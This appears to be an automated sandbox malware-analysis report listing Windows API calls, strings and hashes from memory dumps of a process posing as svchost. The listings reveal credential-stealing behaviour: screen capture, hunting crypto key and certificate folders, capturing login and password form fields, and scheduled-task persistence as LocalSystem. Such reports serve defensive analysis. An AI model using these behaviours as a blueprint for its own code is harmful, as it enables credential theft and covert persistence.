                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ClipboardGlobal$AllocByteCharCloseDataEmptyFreeLockMultiOpenUnlockWide
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1484758812-0
                                                                                                                                                                                                                • Opcode ID: b6e47a87c67b1964e1a9cf9dd3eaf927a1c138a62e783af866083716e58d0053
                                                                                                                                                                                                                • Instruction ID: 8cc72b14de63557dfc7578d500969ec82330998e84a82611ef96b274df7a2112
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b6e47a87c67b1964e1a9cf9dd3eaf927a1c138a62e783af866083716e58d0053
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 89017C32581215BFEB105BA0FC4CEEEBB6CEF9CB51F848115FA45CA244CBA14C60C6B0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • IsWindow.USER32(00000000), ref: 02D2CB88
                                                                                                                                                                                                                • IsIconic.USER32(00000000), ref: 02D2CB93
                                                                                                                                                                                                                  • Part of subcall function 02D2C780: IsWindow.USER32(00000000), ref: 02D2C79D
                                                                                                                                                                                                                  • Part of subcall function 02D2C780: IsWindowVisible.USER32(00000000), ref: 02D2C7AC
                                                                                                                                                                                                                  • Part of subcall function 02D2C780: GetWindowRect.USER32(00000000,?), ref: 02D2C7E9
                                                                                                                                                                                                                  • Part of subcall function 02D2C780: GetClassLongA.USER32(00000000,000000E6), ref: 02D2C7F2
                                                                                                                                                                                                                  • Part of subcall function 02D2C780: PrintWindow.USER32(00000000,?,00000000,?,?,75BF3EB0,?,?,?,02D290B9), ref: 02D2C805
                                                                                                                                                                                                                  • Part of subcall function 02D2C780: RedrawWindow.USER32(00000000,00000000,00000000,00000485,00000000,?,?,?,75BF3EB0,?,?,?,02D290B9), ref: 02D2C82B
                                                                                                                                                                                                                  • Part of subcall function 02D2C780: CreateRectRgn.GDI32(?,?,02D290B9,?), ref: 02D2C841
                                                                                                                                                                                                                  • Part of subcall function 02D2C780: GetWindowRgn.USER32(00000000,00000000), ref: 02D2C84B
                                                                                                                                                                                                                  • Part of subcall function 02D2C780: OffsetRgn.GDI32(00000000,?,?), ref: 02D2C865
                                                                                                                                                                                                                  • Part of subcall function 02D2C780: SelectClipRgn.GDI32(?,00000000), ref: 02D2C870
                                                                                                                                                                                                                  • Part of subcall function 02D2C780: BitBlt.GDI32(?,?,?,02D290B9,?,?,00000000,00000000,00CC0020), ref: 02D2C899
                                                                                                                                                                                                                • memset.MSVCRT ref: 02D2CBBC
                                                                                                                                                                                                                  • Part of subcall function 02D2CA20: GetWindowRect.USER32(02D2CB54,00000000), ref: 02D2CA2F
                                                                                                                                                                                                                  • Part of subcall function 02D2CA20: GetWindowLongA.USER32(02D2CB54,000000F0), ref: 02D2CA49
                                                                                                                                                                                                                  • Part of subcall function 02D2CA20: GetScrollBarInfo.USER32(02D2CB54,000000FA,?), ref: 02D2CA64
                                                                                                                                                                                                                  • Part of subcall function 02D2CA20: GetScrollBarInfo.USER32(02D2CB54,000000FB,0000003C), ref: 02D2CA91
                                                                                                                                                                                                                • GetWindow.USER32(00000000,00000005), ref: 02D2CBDD
                                                                                                                                                                                                                • GetWindow.USER32(00000000), ref: 02D2CBE0
                                                                                                                                                                                                                  • Part of subcall function 02D2CB10: memset.MSVCRT ref: 02D2CB41
                                                                                                                                                                                                                  • Part of subcall function 02D2CB10: GetWindow.USER32(02D2D04D,00000005), ref: 02D2CB5C
                                                                                                                                                                                                                  • Part of subcall function 02D2CB10: GetWindow.USER32(00000000), ref: 02D2CB5F
                                                                                                                                                                                                                  • Part of subcall function 02D2CB10: GetWindow.USER32(02D2D04D,00000003), ref: 02D2CB6A
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Window$Rect$InfoLongScrollmemset$ClassClipCreateIconicOffsetPrintRedrawSelectVisible
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1230479295-0
                                                                                                                                                                                                                • Opcode ID: e1bc78335e49ccde10d95bbfbdc04319ba6dc9534f213f44a5207fa4767c2d9f
                                                                                                                                                                                                                • Instruction ID: edd9db0e0694760dcf2c3a4b15a62b04b85841b74c31fcee354c6fc3b8b24af7
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e1bc78335e49ccde10d95bbfbdc04319ba6dc9534f213f44a5207fa4767c2d9f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 27F0C260E902243ADB217B74AC4DFAF3B6C9B11F04F45040BF504E2380EB945C588BB2
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 02D40340
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(5e8dc15b), ref: 02D40367
                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(?,00000000), ref: 02D403A5
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02D403AF
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02D403B7
                                                                                                                                                                                                                • PathMakeSystemFolderA.SHLWAPI(?), ref: 02D403C9
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 02D403D0
                                                                                                                                                                                                                • SetFileAttributesA.KERNEL32(?,00000000), ref: 02D4040C
                                                                                                                                                                                                                • DeleteFileA.KERNEL32(?), ref: 02D4041A
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(5e8dc15b,?,?), ref: 02D40455
                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(?,00000000), ref: 02D4048F
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02D40499
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02D404A1
                                                                                                                                                                                                                • PathMakeSystemFolderA.SHLWAPI(?), ref: 02D404B0
                                                                                                                                                                                                                  • Part of subcall function 02D48770: UnmapViewOfFile.KERNEL32(?,00000000,00000000,?,?,02D49408,00000000,00000000,75B0A250,?,02D338BD,00000000,00000000,00000000,00000000,?), ref: 02D48797
                                                                                                                                                                                                                  • Part of subcall function 02D48770: GetHandleInformation.KERNEL32(?,?,00000000,00000000,?,?,02D49408,00000000,00000000,75B0A250,?,02D338BD,00000000,00000000,00000000,00000000), ref: 02D487B7
                                                                                                                                                                                                                  • Part of subcall function 02D48770: CloseHandle.KERNEL32(?,?,?,02D49408,00000000,00000000,75B0A250,?,02D338BD,00000000,00000000,00000000,00000000), ref: 02D487C8
                                                                                                                                                                                                                  • Part of subcall function 02D48770: GetHandleInformation.KERNEL32(?,?,00000000,00000000,?,?,02D49408,00000000,00000000,75B0A250,?,02D338BD,00000000,00000000,00000000,00000000), ref: 02D487E1
                                                                                                                                                                                                                  • Part of subcall function 02D48770: CloseHandle.KERNEL32(?,?,?,02D49408,00000000,00000000,75B0A250,?,02D338BD,00000000,00000000,00000000,00000000), ref: 02D487F2
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 02D404B7
                                                                                                                                                                                                                • GetFileAttributesA.KERNEL32(?), ref: 02D404E5
                                                                                                                                                                                                                • SetCurrentDirectoryA.KERNEL32(?), ref: 02D40510
                                                                                                                                                                                                                • memset.MSVCRT ref: 02D4055B
                                                                                                                                                                                                                • lstrcpynA.KERNEL32(?,secret.key,00000104), ref: 02D40575
                                                                                                                                                                                                                • memset.MSVCRT ref: 02D405B8
                                                                                                                                                                                                                • lstrcpynA.KERNEL32(?,secret.key,00000104,?,secret.key,00000002), ref: 02D405D2
                                                                                                                                                                                                                • Sleep.KERNEL32(000003E8,?,?,02D6A56C,00000002), ref: 02D405F7
                                                                                                                                                                                                                • memset.MSVCRT ref: 02D4063A
                                                                                                                                                                                                                • lstrcpynA.KERNEL32(?,pubkeys.key,00000104), ref: 02D40654
                                                                                                                                                                                                                • Sleep.KERNEL32(000003E8,?,?,pubkeys.key,00000002), ref: 02D40679
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?), ref: 02D406B0
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02D406B3
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 02D406C0
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02D406C3
                                                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14},?), ref: 02D406D2
                                                                                                                                                                                                                • Sleep.KERNEL32(000003E8), ref: 02D406E3
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000), ref: 02D406EA
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32 ref: 02D406FE
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D40710
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,?,pubkeys.key,00000002), ref: 02D4073D
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02D40740
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 02D4074D
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02D40750
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,pubkeys.key,00000002), ref: 02D40759
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02D4075C
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D4076D
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02D40770
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$HandleProcess$ErrorFileLastPathmemset$CloseCreateDirectoryFreeInformationSleepValidatelstrcpyn$AdminAttributesBackslashFolderMakeMutexSystemUser$CurrentDeleteReleaseUnmapView
                                                                                                                                                                                                                • String ID: 5e8dc15b$Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}$keys.zip$path.txt$pubkeys.key$secret.key
                                                                                                                                                                                                                • API String ID: 3271848171-2456033755
                                                                                                                                                                                                                • Opcode ID: 275d9a68dba7a5b808ed7f555cc0834044c8364158bc3526c78a6834702a6075
                                                                                                                                                                                                                • Instruction ID: 0177a2fc2f4533052ea6f7126e1eceee0c4e33245d5d3de58812be32f1fc85ea
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 275d9a68dba7a5b808ed7f555cc0834044c8364158bc3526c78a6834702a6075
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 10C1F070944341AFD724DB60A89DFAB7BE8EF85705F548918E68687380EF74CC48CBA1
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000110,?,?,?), ref: 02D306E1
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 02D306E4
                                                                                                                                                                                                                • memset.MSVCRT ref: 02D306FE
                                                                                                                                                                                                                • InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 02D3071E
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,?), ref: 02D3073F
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 02D30742
                                                                                                                                                                                                                • memset.MSVCRT ref: 02D30757
                                                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 02D3076D
                                                                                                                                                                                                                • InternetQueryOptionA.WININET(?,00000015,?,00000000), ref: 02D30789
                                                                                                                                                                                                                • InternetQueryOptionA.WININET(?,00000015,?,00000000), ref: 02D3079C
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000110), ref: 02D307AC
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 02D307AF
                                                                                                                                                                                                                • memset.MSVCRT ref: 02D307CA
                                                                                                                                                                                                                • InternetQueryOptionA.WININET(?,00000029,00000000,00000104), ref: 02D307DD
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,?), ref: 02D30829
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 02D3082C
                                                                                                                                                                                                                • memset.MSVCRT ref: 02D30840
                                                                                                                                                                                                                • memset.MSVCRT ref: 02D30850
                                                                                                                                                                                                                • memcpy.MSVCRT ref: 02D3085E
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 02D308A0
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D308CC
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02D308CF
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D308DC
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02D308DF
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 02D308EB
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02D308EE
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 02D308FB
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02D308FE
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 02D30914
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02D30917
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 02D30924
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02D30927
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?), ref: 02D30946
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02D3094F
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 02D30958
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02D3095B
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 02D30967
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02D3096A
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 02D30973
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02D30976
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$FreeValidatememset$AllocInternetOptionQuery$FileModuleName_snprintfmemcpy
                                                                                                                                                                                                                • String ID: UserAgent$[[[URL: %s%sProcess: %sUser-agent: %s]]]{{{%s$}}}
                                                                                                                                                                                                                • API String ID: 1808236364-2343086565
                                                                                                                                                                                                                • Opcode ID: 0e0621ed03828e7a45cdae49fd96c696e1669c1e68a1777e239503ef4e073fb4
                                                                                                                                                                                                                • Instruction ID: 571a30d91c2f5cef33d4933f176ac749a7a9d2bddaef800de870488e75fe9f11
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0e0621ed03828e7a45cdae49fd96c696e1669c1e68a1777e239503ef4e073fb4
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 71A19C71940209ABEB129BA8EC49FAFBBA8EF89755F144145F904A7380DB709D51CBF0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,self.cer,00000000,00000000,00000000,?,02D2107F,00000000,?,02D2148C,00000000,?), ref: 02D3DAFA
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,\crypto\,?,02D2107F,00000000,?,02D2148C,00000000,?), ref: 02D3DB08
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(00000001,02D66228,?,02D2107F,00000000,?,02D2148C,00000000,?), ref: 02D3DB15
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,\micros~\crypto\,?,02D2107F,00000000,?,02D2148C,00000000,?), ref: 02D3DB87
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,\maxthon3\public\,?,02D2107F,00000000,?,02D2148C,00000000,?), ref: 02D3DB97
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,\microsoft\crypto\,?,02D2107F,00000000,?,02D2148C,00000000,?), ref: 02D3DBA7
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,\crypto pro\,?,02D2107F,00000000,?,02D2148C,00000000,?), ref: 02D3DBB7
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,\progra~1\crypto~1\,?,02D2107F,00000000,?,02D2148C,00000000,?), ref: 02D3DBC7
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,\temporary internet files\,?,02D2107F,00000000,?,02D2148C,00000000,?), ref: 02D3DBD7
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,:\users\public,?,02D2107F,00000000,?,02D2148C,00000000,?), ref: 02D3DBE7
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,02D6A214,?,02D2107F,00000000,?,02D2148C,00000000,?), ref: 02D3DBF7
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(00000000,02D66228,?,02D2107F,00000000,?,02D2148C,00000000,?), ref: 02D3DC03
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,\cryptokit\,?,02D2107F,00000000,?,02D2148C,00000000,?), ref: 02D3DC13
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,:\progra~1\common~1\crypto~1,?,02D2107F,00000000,?,02D2148C,00000000,?), ref: 02D3DC1F
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02D3C350,?,00000000,00000000), ref: 02D3DC42
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CreateThread
                                                                                                                                                                                                                • String ID: :\progra~1\common~1\crypto~1$:\users\public$\crypto pro\$\crypto\$\cryptokit\$\maxthon3\public\$\microsoft\crypto\$\micros~\crypto\$\private\$\progra~1\crypto~1\$\public\$\temporary internet files\$crypto$self.cer
                                                                                                                                                                                                                • API String ID: 2422867632-4225811205
                                                                                                                                                                                                                • Opcode ID: eac7ba4fe8b74de145ed1f5bb3875417292ab32f692453dfc3741bebfd1997c4
                                                                                                                                                                                                                • Instruction ID: cf7a94a8ea8000cd498806f6b4a3d45294b92227087d1095fd0477e6af854ebd
                                                                                                                                                                                                                • Opcode Fuzzy Hash: eac7ba4fe8b74de145ed1f5bb3875417292ab32f692453dfc3741bebfd1997c4
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1E4164B16A131676B7125A35ED8DF7B1F9E8A489D87141412F847F2309FBB8CC4AC9B0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 004033FE
                                                                                                                                                                                                                • memset.MSVCRT ref: 0040341E
                                                                                                                                                                                                                • memset.MSVCRT ref: 0040343E
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 00403446
                                                                                                                                                                                                                • GetVersionExA.KERNEL32 ref: 00403461
                                                                                                                                                                                                                  • Part of subcall function 00403310: GetVersionExA.KERNEL32(?,\\?\globalroot\systemroot\system32\tasks\), ref: 00403337
                                                                                                                                                                                                                  • Part of subcall function 00403310: GetCurrentProcess.KERNEL32(00000008,00000000), ref: 00403359
                                                                                                                                                                                                                  • Part of subcall function 00403310: OpenProcessToken.ADVAPI32(00000000), ref: 00403360
                                                                                                                                                                                                                  • Part of subcall function 00403310: GetTokenInformation.ADVAPI32(00000000,00000012(TokenIntegrityLevel),?,00000004,?), ref: 00403381
                                                                                                                                                                                                                  • Part of subcall function 00403310: CloseHandle.KERNEL32(00000000), ref: 00403397
                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 004034A5
                                                                                                                                                                                                                • _snwprintf.MSVCRT ref: 004034BE
                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,?,?,?,?,?,7604DB30,00000000), ref: 0040351B
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,?,7604DB30,00000000), ref: 00403567
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,7604DB30,00000000), ref: 0040356E
                                                                                                                                                                                                                • memset.MSVCRT ref: 00403586
                                                                                                                                                                                                                • _snwprintf.MSVCRT ref: 004035A0
                                                                                                                                                                                                                • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 004035C3
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004035DA
                                                                                                                                                                                                                • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004035EE
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • <Actions , xrefs: 0040365A
                                                                                                                                                                                                                • <Principals> <Principal id="LocalSystem"> <UserId>S-1-5-18</UserId> <RunLevel>HighestAvailable</RunLevel> , xrefs: 004033C4
                                                                                                                                                                                                                • p=<u, xrefs: 0040379B
                                                                                                                                                                                                                • \\?\globalroot\systemroot\system32\tasks\, xrefs: 004033E7
                                                                                                                                                                                                                • 00-->, xrefs: 0040368F
                                                                                                                                                                                                                • task%d, xrefs: 004034AC
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2909940532.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2909940532.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Filememset$Process$HeapTokenVersion_snwprintf$AdminAllocCloseCountCreateCurrentHandleInformationModuleNameOpenPointerSizeTickUser
                                                                                                                                                                                                                • String ID: <Principals> <Principal id="LocalSystem"> <UserId>S-1-5-18</UserId> <RunLevel>HighestAvailable</RunLevel> $00-->$<Actions $\\?\globalroot\systemroot\system32\tasks\$p=<u$task%d
                                                                                                                                                                                                                • API String ID: 1601901853-1711019342
                                                                                                                                                                                                                • Opcode ID: 3e75ff0d6558df4951f578cf3538052f2bff9976cb2e3b9c80236ffe9a2ee6c0
                                                                                                                                                                                                                • Instruction ID: 1b369b621c6b50f993c5cfef2b03b24b37f74764d04c33fe2e8d64a6d5fdefe9
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3e75ff0d6558df4951f578cf3538052f2bff9976cb2e3b9c80236ffe9a2ee6c0
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F8D1C3B1504301ABD720DF64CC49B5B7BE8EFC8715F048A29FA49A72D1E774EA04CB99
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,?,74DEF570,?,?), ref: 02D38A83
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 02D38A8A
                                                                                                                                                                                                                • memset.MSVCRT ref: 02D38A9E
                                                                                                                                                                                                                • IsBadReadPtr.KERNEL32(?,?), ref: 02D38ABB
                                                                                                                                                                                                                • memcpy.MSVCRT ref: 02D38ACC
                                                                                                                                                                                                                • strstr.MSVCRT ref: 02D38ADD
                                                                                                                                                                                                                • strstr.MSVCRT ref: 02D38AF0
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(5E8DC3C1), ref: 02D38B1D
                                                                                                                                                                                                                • PathAppendA.SHLWAPI(?,5E8DC3C1), ref: 02D38B2B
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(5E8DC3C1), ref: 02D38B36
                                                                                                                                                                                                                • strstr.MSVCRT ref: 02D38B98
                                                                                                                                                                                                                • strstr.MSVCRT ref: 02D38BAB
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(5E8DC473), ref: 02D38BDD
                                                                                                                                                                                                                • PathAppendA.SHLWAPI(?,5E8DC473), ref: 02D38BEB
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(5E8DC473), ref: 02D38BF6
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02D421E0,00000000,00000000,00000000), ref: 02D38C51
                                                                                                                                                                                                                • strstr.MSVCRT ref: 02D38C70
                                                                                                                                                                                                                • strstr.MSVCRT ref: 02D38C83
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(02D7D098), ref: 02D38CAF
                                                                                                                                                                                                                • PathAppendA.SHLWAPI(?,02D7D098), ref: 02D38CBD
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(02D7D098), ref: 02D38CC8
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02D43910,00000000,00000000,00000000), ref: 02D38D23
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02D38D3B
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D38D4C
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D38D5B
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02D38D5E
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D38D6B
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02D38D6E
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Path$BackslashHeapstrstr$AppendProcess$CreateHandleThread$AllocCloseFreeInformationReadValidatememcpymemset
                                                                                                                                                                                                                • String ID: &ctl00%24MainMenu%24Login1%24Password=$&ctl00%24MainMenu%24Login1%24UserName=$5E8DC3C1$5E8DC473$login=$name_$pass.log$pass_$password=
                                                                                                                                                                                                                • API String ID: 3712039096-2536547967
                                                                                                                                                                                                                • Opcode ID: a08c1e3a03c573678740ee94f06e93491386f7c57590cc573a62cef3f4c68138
                                                                                                                                                                                                                • Instruction ID: 27c12d36f0bc539b1b2487ccb16322683e8b9345ae28c93cb549c9492eb43874
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a08c1e3a03c573678740ee94f06e93491386f7c57590cc573a62cef3f4c68138
